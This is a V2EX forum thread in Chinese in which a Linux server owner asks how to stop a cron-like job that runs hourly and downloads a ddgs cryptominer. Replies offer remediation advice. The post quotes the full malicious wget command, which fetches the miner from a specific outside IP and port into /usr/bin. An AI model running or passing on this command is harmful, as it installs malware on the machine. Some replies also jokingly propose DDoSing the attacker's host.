Home Sign Up Sign In
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
ying5201314
V2EX  ›  Linux

求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

  •   
  •   ying5201314 · Apr 18, 2020 · 6058 views
    This topic created in 2243 days ago, the information mentioned may be changed or developed.
    wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
    ip 103.27.42.76 是日本
    每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
    没有找到定时任务
  • wget
  • 103.27.42.76
  • 执行
  • t1800
    27 replies    2020-04-21 13:40:01 +08:00
    sadwin
        1
    sadwin  
       Apr 18, 2020
    有在跑 redis 吗? 有可能是 redis 被黑了
    Hurriance
        2
    Hurriance  
       Apr 18, 2020
    redis 上密码
    renmu
        3
    renmu  
       Apr 18, 2020 via Android
    cron 里没有?最好的方法就是重装系统
    claysec
        4
    claysec  
       Apr 18, 2020
    没有重要东西就直接重装系统。
    sadwin
        5
    sadwin  
       Apr 18, 2020
    可以看下这个 https://www.v2ex.com/t/623847
    GGGG430
        6
    GGGG430  
       Apr 18, 2020   ❤️ 1
    首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
    其次可以通过 alias 重命名 wget 为其他命令
    cnzjl
        7
    cnzjl  
       Apr 18, 2020
    最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令
    ik
        8
    ik  
       Apr 18, 2020 via iPhone   ❤️ 1
    建议重装,想排查问题可以先
    > /usr/bin/uvggee
    chmod 000 /usr/bin/uvggee
    chattr +i /usr/bin/uvggee
    然后再排查问题
    imdong
        9
    imdong  
       Apr 18, 2020   ❤️ 2
    非专业,笨笨的方法:

    比如自己写一个 shell 命名为 wget,然后在里面获取一些父进程信息?
    然后用这个 shell 替换(覆盖) wget ??
    won
        10
    won  
       Apr 18, 2020   ❤️ 3
    1 top 到进程号
    2 ll 到执行位置
    3 rm 掉
    4 crontab 里删除,并添加一个 1 分钟守护
    5 restart
    i999999
        11
    i999999  
       Apr 18, 2020 via Android   ❤️ 1
    建议重装系统,没办法重装的话可以把 wget 和 curl 工具重命名
    guog
        12
    guog  
       Apr 18, 2020 via Android   ❤️ 1
    七天了,楼主这个问题还没解决?大家给你的方案你试过了吗
    Rxianbei
        13
    Rxianbei  
       Apr 18, 2020 via Android
    @cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis,但是没有公网,装了都大半年了,想来也后怕,请问应该怎么排查?
    ying5201314
        14
    ying5201314  
    OP
       Apr 18, 2020
    试过了,主要不能重装,不然早解决
    ying5201314
        15
    ying5201314  
    OP
       Apr 18, 2020
    试过了,主要不能重装,不然早解决 1
    @guog
    defunct9
        16
    defunct9  
       Apr 18, 2020 via iPhone
    开 ssh,让我上去看看
    xupefei
        17
    xupefei  
       Apr 18, 2020 via iPhone
    还有个可能是服务器跑了 yarn 。
    Guys
        18
    Guys  
       Apr 18, 2020
    先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.
    musi
        19
    musi  
       Apr 18, 2020
    你在 v2 上发个求 d 帖把那个服务器 d 挂就好了
    xingheng
        20
    xingheng  
       Apr 18, 2020
    pstree 找到是哪个主进程启动的 wget,然后删除主进程的执行文件就行了吧。难道还有守护进程??尝试 watch+pstree 。
    patx
        21
    patx  
       Apr 18, 2020
    发到全球 ddos 论坛上去
    JustSong
        22
    JustSong  
       Apr 19, 2020 via Android
    可以用防火墙进行限制么
    Hades300
        23
    Hades300  
       Apr 19, 2020 via Android
    用 iptables drop 包就完事了
    msg7086
        24
    msg7086  
       Apr 19, 2020   ❤️ 1
    既然能写入 /usr/bin,那说明别人已经拿到了 root 权限,那从内核到系统文件,所有的程序都可能会被换掉,你不重装难道留着过劳动节么。
    realpg
        25
    realpg  
    PRO
       Apr 19, 2020
    我猜你是 centos
    cnzjl
        26
    cnzjl  
       Apr 20, 2020
    @Rxianbei 排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~
    zhao305149619
        27
    zhao305149619  
       Apr 21, 2020
    这种一般有 cron 的定时脚本,还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现,所以有时候发现把 cron 停掉之后过一会还是会出现。
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   939 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 70ms · UTC 19:48 · PVG 03:48 · LAX 12:48 · JFK 15:48
    ♥ Do have faith in what you're doing.